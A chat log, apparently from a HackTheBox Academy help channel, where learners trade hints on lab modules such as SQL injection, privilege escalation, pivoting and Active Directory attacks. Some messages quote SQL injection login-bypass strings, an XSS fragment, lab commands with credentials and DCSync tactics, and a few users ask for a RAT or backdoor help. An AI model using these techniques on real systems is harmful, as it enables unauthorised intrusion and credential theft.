its a terrible condition

honestly don't think programming is that difficult compared to pentesting. Pentesting much harder

Cry0l1t3's bash module took 5 years off my life

you still did it though

I think it should be a basic module like Tier 0 where you teach what is a variable, a loop, a function, a type. It could help a lot the beginners

isnt there a module like that already?

i think its 50 cubes

Have at it boys!

50 cubes is reachable as F2P? I do not know the prizes really, i just paid 🙂

its a different way of thinking... programmers build systems, pentesters break and manipulate them

So a basic knowledge of py and bash is recommended?

Or you could spend a grand total of five united states dollars to purchase the cubes

it definitely helps

@craggy kernel absolutely, not exactly bash or py but the basics of any programming language

Ohh ok that’s fine then

Actually I don't know can you get 50 cubes from a free account?

yes

There you go, Cry0l1t3 will torture you for free

Cool then, i'll start redirecting people to that module then 🤣

Could I get some help on logging in with IMaps/pop3 on the Footprinting hard module?

I swear I found creds in || snmp || but its not working

if you got ||tom|| cred openssl should work

Oh shiz I didn't inspect enough

lol

https://tenor.com/view/man-ray-facepalm-spongebob-spongebob-facepalm-manray-facepalm-gif-18701906

Im also going to predict your next pain point and preemptively tell you to copy paste the thing inside sublime or vs code instead of what you were going to try first that wont work.

This will make sense when you get there

i did try this but i still got my stuff corrupted or something and have to use ||putty|| to fix it

can i get a bruteforce working tool other then buirp

umm your pfp is concerning ngl

even if meant ironically

itd certainly be an instaban on the server I moderate, dunno about here

its a meme

very funny 💯 🤣 🔥

Lol XDDDDD

alr i changed it

u happy?

yesh

bruteforcing what?

really depends

Hey can anyone tell me....please..
That can I host CTFs in hackthebox CTF platform for free?

a log in page

OWASP ZAP is used as FOSS alternative to BUrp

Hydra

That is what I use

umm can i use it for a unknown website?

cause iam working on a website and i wanna have an anti brute force attack in it

Just do timeouts

like fail2ban

too many wrong attempts and just blacklist the IP

also enforce good security policies for password strengths so you or anyone else cant just use a shitty password

deos it prevents it?like hydra or buirp

yes

they get a couple of tries to guess the correct passwofd

so why wont big websites use it?if that is the case

They do

Why does this keep throwing an error for a missing colon, when it is very clearly there

Nobody bruteforces main login pages these days. If theyre going to its going to be on an obscure forgotten server that isnt setup properly, or its something like password spraying, where they take one or two really common passwords and try mass different users to try to gain access to at least one or two of em

fail2ban and the likes are the common driving force behind this

but what if regular users keep trying passwords they are going to get blocked to

Yup

You cant have your cake and eat it too

you can configure things like fail2ban to be as restrictive or as generous as youd like

can also mix strategies

imma try to make user add uncommon symbols like @# etc.. in the policy and make at least 8 characters password long

configure fail2ban to target high speed brute attacks, and then use account lockout policies that are more generous, say 10 given attempts within a certain time frame, and have accounts unlock after 24 hours or so. Basically just make it ridiculously slow to brute.

yeah certainly a start

just if you do the account lockout thing, youd want to whitelist admin accounts and maybe lock down that account with additional security measures so an attacker cant purposely lock out the admin accounts

Hey guys

but why Facebook accounts getting brutforced everyday

They dont

they get password sprayed or credentials stolen from leaks/other means

Someone who can help me out with packet inception, dissecting network traffic with wireshark

so whats the use of hydra then

1. login services havent always had so many good anti-bruteforce measures and 2. There are other services than just http/websites that can have login mechanisms to brute force.

anyone have safe njrat?

oh thanks for the help fr

oh and 3. Smaller websites that dont think to use something like fail2ban or put in the effort youre putting in tend to be more vulnerable to easy attacks like brute forcing, so hydra still becomes relevant against those targets.

IM DOING INFormation gathering now and i cant seem to get thel ast question to work i tried using the passive and active methods they taught us in the module but i could get it to work i also tried to use sublist3r but that didnt work either it would give me no answer

the question is broken, try using https://subdomainfinder.c99.nl/

itll give past scan results that will include the answer

sublist3r worked for me but that was a while back

Yeah sublist3r was the original intended route, but stuff changes

thats twice they have been blocked.

part of the fundemental risk of incorporating real world elements like that. Its nice to have a real world element but it means that the content can become broken in a moments notice

I would think they would just set up a site specifically for that part of the module.

¯_(ツ)_/¯

Hey fellow hackers, working in windows fundamentals, got this error message any ideas?

Hello, can I ask for some help?
Stuck at privilege escalation : https://academy.hackthebox.com/module/77/section/844
my progress so far : got to user2, got the flag. Generated ssh key, can't put it to /root/.ssh/authorized_keys (access denied), and despite the fact I left password empty, it still asks for password when I try to ssh using it to either user2 or root at a remote. I'm clearly doing something wrong, but can't figure out what

getting it's indigenous /root/.ssh/id_rsa key also results in nothing since it asks for password for a key anyway (which I obviously do not know)

@woeful oxide try rdesktop

Got it

It worked

Thanks

Youre not supposed to generate a ssh key to insert at all

ah

seems like I actually forgot last time to use chdmod 600 on extracted rsa key after all

now all works

common mistake 🙂

sweet jesus, I've been stuck for 3 days with it

anyway, thanks for assistance

np

hello, I'm having a problem unlocking modules in the Academy! I have enough cubes, but when I press the "unlock" button, nothing happens. The page just seems to move a little bit to the left. I've had the same problem in firefox and chrome on windows, out of a VM. Is this a known issue or am I doing something wrong?

any hints for sql injection skill assesment? i am stuck at the login page😂

Im also doing it

Found something but still stuck

There is a vuln there

Nice think i ve got it

Or something

Dm me if you want a hint

try a hard refresh with ctrl + shift + R if that still doesn't work contact support

i think one of the payload in ||payload all the thing|| work for that or something

Bye

hmm, trying to ssh connect to a host for a module problem, but the connection keeps timing out

Ldamn dont listen too me haha

anyone can help with DNSAdmin section of windows privilege escalation?

anyone available who completed the password attacks module? How do you deal with the backup.vhd file? How do you get a local copy on your machine from smb? tried to access in both smbclient and a windows vbox using the GUI. All I can do is see the backup.vhd. Not sure what to do from here. Because of the size of the file cant use normal means of file transfer.

sounds like a problem with your VM. We should be able to just grab it with the "get" command. Have you tried PwnBox?

no have not ill give that a shot.

hey can anyone help me out with the last part of the common applications - skills assesment I?

yes put it on the pwnbox and then if you need to transfer it off i like to use www.ufile.io

having some problems fuzzing

i might be able to help

can I dm you?

yep

Figured it out.

nice work 🙂 sorry did not mean to ignore you

No worries. Thank you.

where is that :((

hey. i need help for this question
Enumerate the custom script that is running on the system and submit its output as the answer.
Footprinting
SNMP

@sly grotto what is the problem

what is the meaning of this?
Enumerate the custom script that is running on the system

i mean.how can i do that

Which module are u doing

Footprinting
SNMP

@sly grotto use a word list in seclists and use onesixtyone tool

i did but could not find the answer

@sly grotto what file did u use

snmp-onesixtyone.txt and snmp.txt

managed to found i was looking into the wrong group. thanks

When a module says "updated" beside it, does it mean updated since you started/completed the module or does it just show "updated" to everyone?

sql injection, fundamentals - skill assesment...I can't find the writing files where i can place my injection...can anybody help?

Hi! I figured out what was happening. It was because of an adblocker (ublock). The moment I turned it off, it worked. Mentioning it in case someone else has this problem in the future

Should be to everyone. For example if you completed a module, and the owner updated it with new text (for example erratum), its ok, u dont need to do anything. If it adds an additional task to do, you should see that the module should not completed to 100% anymore

oooft good point, i never even thought about it going from complete to incomplete.. assumed one youve hit "complete" it would stay completed. i was more just thinking if there is new content i wouldnt mind reviewing it, but couldnt remember if the modules said "updated" before i did them xD

I saw that on my Academy profile... Im not sure if it was on a path or on a module... maybe a module

Few modules that has been updated, I had to do the updated portion to get the 100% again 😄

Just finished attacking enterprise networks, that was brutal

If you still need help then hint then look at the url

because the vpn does not allow to hear the voices

Isnt academy a sortof school for good and evil? Hahaha

Of course

Hi, I am still confuse about HTB, so if I pay for premium subscription do I get access on everything and cert paths?

Sorry I am still confuse about HTB's UI there is so much going on I am confuse lol

I'm running into exactly the same difficulties with the same question, would anyone be willing to share a hint?

Hey, I'm doing the pivoting module and stuck on the skills assessment question 6, I have rdp to the ||172.16.5.35|| box (which has another interface with IP ||172.16.6.35||) and tried scanning from there the ||172.16.6.1-254|| space but found no hosts alive. Noticed that both interfaces in that box have configured as DNS a ||172.16.10.5|| but that address is not reachable, any hints as to where to go from here?

Did you have a look if there are any other users on the machine?

Nvm, a fair bit of googling and I was able to find the answer. If there's a way to do so on the machine, please share.

DM me 😉

wait nevermind... just read your question more carefully lol

yes its a Google question

i did not care for it

Good to know. Might be worthwhile specifying that it has to be looked up, spent the better part of this afternoon on it. 😦

I know. It kills the momentum of the module imo

yes one more user, nothing on Desktop, Docs or Downloads folder, was able to dump creds, but no other hosts to use

Did you try the cmd ping scan as well to look for hosts?

yep, on few ranges actually and nothing coming up this is what i used
for /L %i in (1 1 254) do ping ||172.16.6.%i|| -n 1 -w 100 | find "Reply"

for that a sweep don't always work for me so i recommend a gui tool call wnetwatcher

trying that now.. lets see if it works

feeling like there is something broken with that lab hahaha, can't find any more hosts

Yea, sounds like a reset is in order. Your previous command was successful for me when I did the module.

I have reset the lab like 5 times now 😫

didnt pick any other host, but thanks for the tip. scan is way faster than the ping

did you change the network interface? if you click f9 or go in to the advanced menu or something you find the network interface

no I did not..

found it and another IP came up.. thank you!

damn ping scan

@arctic acorn @vital adder thanks guys 🤜 🤛

Finally hehe just got the first flag of halloween ctf

Wrong channel

@silver zenith congratulations 🎊 👏 💐

Tnx

Hi everyone ! I need help on one of the module
Attacking Common services
FTP

I found the USER J and R, i bruteforced J pwd and modified a file to allow me to ssh into the host as J.
But it seems that I need to do that with R, I tried to bruteforce both SMB and FTP with the normal list and a mutated version of it, but no luck.

Can I have a hint ?

so did you use the wordlist ||found in the ftp server?||

hmmm

not yet ! I'll keep diging

hint it's way more easier than you think

Can I pm you ? I don't want to spoil the others

sure

Hi everyone,
This question is not related to HTB, it is related to THM room. I am extremely curious in the room Avenger Blog at Task 6 (SQLj) as follows
According to the material, it says the SQL query is SELECT * FROM username='[input1]' AND password='[input2]';
→ if I put ' OR 1=1; -- - in username, the SQL query should become SELECT * FROM username='' OR 1=1;

So my question is Why can I only bypass login when injecting both username and password is ' OR 1=1 -- ?

hello everybody
guys i really would like to come to an end with the sql injeciton fundamentals modul...
but i have no idea how to start in the skill assesment...can anybody help me...?

Review the module and follow the steps, treat it like a knowledge check but harder, are you in an admin login? How does vulnerable pages to sqli behave when they receive an input? If it’s the case for what error are you looking for or which output do you want to receive? How do you check for DB version with sqli?

If you need more hints dm me

Um I am a beginner

I just started with the fundamentals and i am facing an issue in answering one of interactive questions

the question is about the most likely os flavour and i tried parrot and Parrot and Parrot1 and so on but it still tells me it is the wrong answer

Linux or Windows?

try a hard refresh with ctrl + shift + R or if you have ads block on try turn it off to see if that fix it

Can anyone help me figure this out?

can you use conditions in FROM statement?

yess I did try to use ' OR 1=1; -- - → It should work but not, you have to use on both username & password in order to bypass login

i was able to login...but i really have a problem to understand where and when i have to use the ' in the sql injection..
||admin' or '1'='1-- - did not work
admin’ or ‘1’=’1’-- - did work... why?||

Hello! Recently this year, I've been wanting to get more into Cyber. So far I'm just going through HTB's academy and I'm still at the start of it, I see for the Setting Up module, Parrot is recommended for the Linux distribution used. At the moment my device is set up with Dual boot between Windows 11 I heavily regret updating that and Linux Mint which I'm still getting used to. Right now I'm wondering for the most part, what makes Parrot better than other distributions for cyber? Should I not spend time on installing all of the tools/packages on my Linux Mint system and be good?

it is recommend to use something like parrot or kali in my opinion mostly because almost all of the tool and thing you will need is pre-install

hi guys, do you know what is the basis for the recommendation of boxes when you finish a module? I can't find the relationship between the Network enumeration with nmap module and the suggested boxes.

Anyone stuck in the Skills Assessment - WordPress?

I need to identify the version of wordpress site, but the site seems does not using wordpress

how to turn 2 characters into 1

two letters in one

hint ||wordpress isn't on this domain||

@earnest flame sir !!!! please add this account !!!!! it is very le urgent before I leave

a very unfortunate incident happened

THANKS SIR CYA IN EEV

That’s not the domain your looking for

Thanks a lot

Has anyone passed the bug bounty exam? Any review?

Hi guys I’m new to hacking

I want to learn from scratch

Can you guys help me.

https://www.youtube.com/watch?v=lhz0-qAQlBM

Thanks buddy

stuck on this question "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain."

can anyone push me in the right direction with the following question for AD Skills Assessment II?

Create a user list and then use a technique to spray passwords

HELP

HELP ME

GUYS

I NEED HELP

No one likes to help someone that spams all caps help repeatedly

in multiple channels no less

Ok im sorry

But there is a virus in my computer

I need help

yeah this isnt the server for that

were not tech support

Maaan

best of luck, try repair shops in your area 👍

Alr

alr

Thx

I never thought Jesus would be a computer guy

He isnt, thats why hes asking for help lmao

😂😂

how to send a message every 2 minutes

Why do you want to spam in first place?

Hi seeing if any ones done the Windows Privilege Escalation module may be able to give me some insight. Stuck on the section titled "Credential Hunting"

question "Search the file system for a file containing a password. Submit the password as your answer." Hint: :"Start at C:\Users"

Did indeed find a txt file at c:\Users\htb-student\Documents containing a password but when I enter it HTB is saying its incorrect. Am I missing something or is this an error in the module?

So for Linux Fundamentals. I have been stuck on this question for 2 days, and google has provided me with 87 ways to find an incorrect answer. Anyone available to help with what should be a simple problem?

hint that section have a lot of false password just to f with you, you need to find the password and like the hint said it's in C:\Users

sure what's the issue?

I just brute forced it before I went insane but. TLDR: How many Services are Listening on the Target System on all Interfaces. I ran basically every single netstat grep pipe yadda blah blah command I could think of. I found atleast 18 different answers but none of those were correct.

I dont understand why the answer was the answer as I never got it as an answer but. It was.

oh yeah i remember this section was hell for me too but what is the same of this section?

I mean. Atleast I was on the right track and using the right commands. So. That makes me feel better

Hey guys -- I am working through the AD Enumeration and Attacks course. I am doing the first AD Network after completing the course. I cannot seem to find tpetty's clear text password. I have tried mimikatz on ms01 as well as the web server. I have used powersploit to search in the description field. I have searched through sysvol. I understand I need to get the password to perform a dc-sync attack but man I am lost on where the heck it is?

yeah and in my note i have to filter out ||127.0.0|| for some reason

Yeah I did that, and didnt do it, limited to 4, limited it to 6, included all. did so many different things

I came up with 87, 106, 192, 10, 8. None of which were correct so I was mildly annoyed.

thanks, found it. thought it checked it there before but guess not.

try ||running lazagne from an elevated powershell||

Will do! Here is the funny thing. I found a different path and just got the final flag but still don't have his clear text creds lol

I ended up using mimikatz to launch a powershell window with tpetty's ticket and performed a DC Sync that way on the admin account. If it works, it works!

ah very nice

I had his hash just not his password

i think we are actually covering this in the new Password Attacks sections 😉

Sounds great! I didn't know it was possible to perform a DC Sync attack with only the users hash. Definitely going to document how I did that in my notes!

yea how did you dcsync from inside the powershell?

I'll DM you my notes

hey

i want to start my journey as a programmer

can

u advice me

or anyone

im just beggining

i exited as well as confused

where can I learn about crafting backdoors

i am using windows

okay

ah turning off ad blocker worked!

Thank you very much @vital adder

anyone done the Markup box recently?

Hi, is Anyone still working on Windows priv/ escalation further credential theft? I need a little hint on that section. question 1. I got a password from .xml file in dv folder but it seems that the password is hash?

Got it... just use tools

how long to recreate linux

Hello guys

Hello

Hey how to join a text only in one character

hello in just one letter

is it me or things changed around here ... like an upgrade

Things changed in the upgrade

Hi - i am on the Module "Getting Started" - Part: "Nibbles - Privilege Escalation".

I successfully started a shell by executing the .php script on the WebServer and got a TTY_Shell by using Python3 and pty (like its written in the Module...^^).

But when i try to use the sudo command to execute the modified monitor.sh file, i must enter a password for the user "nibbler", but the LinEnum.sh Skript said i wouldnt need the Password. In the Module Description they didnt need a password either.

Can someone give me a hint to my mistake?

Never Mind - seems like you have to give it the full path - and its not enough to be in the actual directory and just use sudo monitor.sh (seems like i have to read about this later...^^)

Hi guys, need some help with PIVOTING, TUNNELING, AND PORT FORWARDING - Skill Assignment, have rdp into the first Win target and dumped the lsass. Stuck on send the file back to the pwnbox. Tried to forward the pwnbox 445 but no luck...

I need some help on that

I have already tried to attempt with Adjacent

https://tenor.com/view/porno-kermit-watching-porn-gif-12263091

Re read the values

True :/

which channel to get technical help?

nevermind, needed to change /sec option in xfreerdp to rdp to windows server 2008

an academy within an academy 🙂

Hi! I need some tips please. I have access to the user 2 directory where is located the flag.txt file, but i cant see the content.

"SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'."

Im doing File Upload Skill assessment, I have bypassed the filter but i cant find the upload directory..

Is anyone able to help? I'm trying to do the XSS Phishing payload.

Does anyone know how I can connect me to the FileZilla-Server on the Windows File Transfer Methods. I have problem with the login. I tryed the username anonymous with no password, but I always get an login incorrect. I guess its the only way to use FileZilla, because there is no else opportunity to upload a file. So does anyone know the login credentials for the FTP-Server?

can anyone help me with the password attack skills- Medium?

@autumn garnet what is the problem

i got on the user jason but i cant figure out how to get on to any other users

anyone can help with attacking common applications sql?

im getting pissed at this module

Windows Privilege Escalation Skills 1, I’ve gained a shell as IIS but no matter what I’ve tried I can’t find the ldapadmin password or escalate credentials… any hint ?

@autumn garnet did u look for any file or keys for ssh

in jason i ran ls -al, no .ssh or .bash_history, but i seen in dennis theres .ssh and .bash_history but i have no idea how to get into dennis

hi guys i am struggling on this question of AD module, the users details provided havent got the privilege to run a full pass-pols in order to answer to this question:

What is the password history size of the domain? (How many passwords remembered.)

Is powershell the bash terminal?

Do someone have a hack apps?

hint you need to Privilege Escalation in to user2 to get the flag

Hack apps ?? 🤔😂😂

hint you need to read the ||source code||

if you are haveing issue with the payload add this at the end instead of the thing they give you <!--');

Can i dm you ?

i don't fully understand what you mean and i'm not sure that windows machine have ftp also they did give you the cred for rdp to use that

sure

hint check what is running on the target mahine

which section are you on? and i don't see anything about sql injection for this module in my note

attacking sql databases

with mssql database

do you mean the Attacking Common Services module?

its not letting me scroll to the bottom of the windows screen to get at start button or task bar in the first Windows Fundamentals section

can someone help me with this?

if you need to DM me that's fine

thanks for the tip, ill enumerate abit more with that in mind

hi is anyone available to help me?

can you send a screenshot of that?

if you still need help with that shoot me a dm

wtf is that

if you look on the right there's no start button and I can't scroll down to get to start button

in the Windows VDP connection

ye

oh a small tab thing just use a normal tab for that

clicl full view

so do you have issue with question 1 or 2?

both for sure xd

i dont know what to do

hint you can use the method show in ||Capture MSSQL Service Hash||

it won't let me click full view

"maximize" is greyed out

ye i tried with impacket

I used the tab key to get start button but I can't see what is currently selected so I kind of have to guess

lol

inconvenient

I got powershell open

close and open the browser again

I did

ok its really weird

ohh i just realized do you have 2 browser tab on 2 side of your screen?

yes

thats why

yes

ok

yeah then i think that is the issue

the pwnbox need a full tab to work

ok ya when I open it up full screen it fixes it

or something like that

thanks

true, also the paste button

ok thanks

if you dont use the full tab/page you wont see it

anyways I gotta go to a workout. thanks for helping me with this

I will use actual full screen from now on

└──╼ [★]$ python3 ldapsearch-ad.py -l 10.129.42.188 -d inlanefreight -u james.cross -p Academy_Student! -t pass-pols

Result of "pass-pols" command

Default password policy:

[+] |___Minimum password length = 7

[+] |___Password complexity = Disabled

[*] |___Lockout threshold = Disabled

[+] No fine grained password policy found (high privileges are required).

if anyone can help with active directory on password lenght question

so i check with nmap and only found the smb services running for tcp and for udp i found 137 open but didnt find anything for the udp. i already got jason log in from the zip file in the smb shares and havent found any other users with any other files on smb. i check whats running on they system with "ps aux" and only found mysql is running but i dont know any databases in mysql.

hint you are on the right path at ||the end there|| also a another hint for this part is ||try with what you got||

thank you so much, bro. i got it now. can i buy you a beer or something?

bro i really need hint to that

i tried impersonating, xp_subdirs etc.

and using responder is pointless

ill change my background on my kali vm to it for a week

I need a hint/nudge for this module question that I've been stuck on all weekend. I'm tasked with SSHing into a server using provided credentials, finding a way to swap users, and then grabbing the flag.txt. I can log in just find, but after that, I can't figure out how to proceed. The hint is to review what I've learned in this module, but a chunk of it isn't even applicable here. I tried doing a reverse shell, but the connection keeps timing out when I try to connect back. Sudo -l lists nopassword for user2 for /bin/bash as well

Try ctrl+ h

i managed to do that, sorry for bothering

Hey guys, need a clue into the right track on the last question of the SNMP Footprinting, "Enumerate the custom script that is running on the system and submit its output as the answer."

Alright, I'm taking a break from this. I have no idea what I'm missing and feel like I've tried every angle that I can think of/have been shown that is applicable. Will check back a bit later after I've done a mental reset

hint re-check the stuff under User Privileges and are you in the Getting Started module Privilege Escalation section?

you can answer ||all 3 question|| with the ||given snmpwalk|| command

I am, but swapping user2 via su -u user2 asks for a password I don't have

Hi, anyone have any hints on how to find the flag with NSE? ran scans for a few hours now. Not sure what to look for.
Thanks

i saw Jesus Christ in here Yesterday and now i saw TaylorSwift typing

Hahaha

if you run sudo -l i don't remember exactly what command can you run as root without any cred but it isn't the su command so you can't use that

which section and module?

Nmap Scripting Engine module 7

the module name not the module url number

also i just try url 7 don't point to any module

Network Enumeration with Nmap

sudo -l gives (user2 : user2) NOPASSWD: /bin/bash

yep you can run bash as root without any cred

but I don't understand how that helps me or what I'm supposed to do with this information when it comes to swapping to user2. I checked out gtfobins for bash and nothing there seems like it would be useful, unless I'm missing something

its lateral movement

user2 may have access to stuff that can be useful that user1 does not

so basically the sudo -u tag is for running command as other user in the example they run echo and in this your case you can do use the same thing but you have access to bash so can just spawn a shell

omfg

alright, ty both

I'm noticing a trend here that overthinking things is very easy to do lmao